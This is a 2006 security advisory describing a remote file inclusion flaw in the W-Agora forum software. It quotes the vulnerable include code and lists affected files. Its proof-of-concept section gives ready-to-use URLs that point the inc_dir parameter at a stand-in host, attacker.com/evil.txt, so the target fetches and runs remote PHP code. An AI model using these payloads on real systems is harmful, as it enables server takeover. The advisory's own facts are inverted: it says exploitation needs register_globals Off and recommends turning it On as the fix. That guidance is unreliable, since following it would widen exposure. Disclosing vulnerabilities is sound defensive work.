[ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion
ECHO.OR.ID
ECHO_ADV_34$2006
---------------------------------------------------------------------------------------------------
[ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion
---------------------------------------------------------------------------------------------------
Author : Dedi Dwianto a.k.a the_day
Date Found : June, 20th 2006
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv34-theday-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
W-Agora (Web-Agora)
Application : W-Agora (Web-Agora)
version : <= 4.2.0
URL : http://w-agora.net
Description :
W-Agora (Web-Agora) is a database-driven communications system which allows you
and your visitors to store and
display messages, files, and other information on your web site. More than
"just another Web BBS/forum software",
W-Agora is designed so it can be easily customizable through a Web browser and
the use of templates.
It can be used as a BBS, guestbook, download area, or publishing system.
Several database backends are supported such as MySQL, Postgres, mSQL, Oracle
and DBM.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~~~
-----------------------insert.php----------------------
....
<?php
if ($bn_search && ($bn_doc_type == "static") && ($bn_search_engine != "none")
) {
include "$inc_dir/$bn_search_engine.$ext";
$search->indexNotes();
}
?>
...
----------------------------------------------------------
Input passed to the "inc_dir" parameter in insert.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources
Affected files:
admin_notes.php
admin_subscribed_user.php
admin_user.php
browse_avatar.php
close.php
create_forum.php
create_site.php
create_user.php
delete.php
delete_site.php
download_forum.php
editconf.php
edit_site.php
export.php
forgot_password.php
index.php
insert.php
search.php
view.php
update.php
setup.php
profile.php
register.php
rss.php
list.php
forgot_password.php
include/mail.php
include/fileupload.php
include/msql.php
include/dbaccess.php
include/form.php
include/postgres65.php
include/postgres.php
include/mysql.php
extras/quicklist.php
extras/shared_user.php
user/ldap_example.php
tools/upgrade_401.php
tools/upgrade_402.php
tools/upgrade_42.php
tools/upgrade_site_401.php
tools/upgrade_site_402.php
Successful exploitation requires that "register_globals= Off ".
Proof Of Concept:
~~~~~~~~~~~~~~~~~
http://target.com/[w-agora_path]/index.php?inc_dir=http://target.com//inject.txt?
http://target.com/[w-agora_path]/search.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/view.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/update.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/tools/upgrade_401.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/include/mail.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/extras/quicklist.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/register.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/rss.php?inc_dir=http://attacker.com/evil.txt?
and more Affected files
Solution:
~~~~~~~~~
Change register_globals= On
in php.ini
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,kaiten
~ Lieur-Euy,Mr_ny3m,bithedz,an0maly
~ newbie_hacker[at]yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~
the_day || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------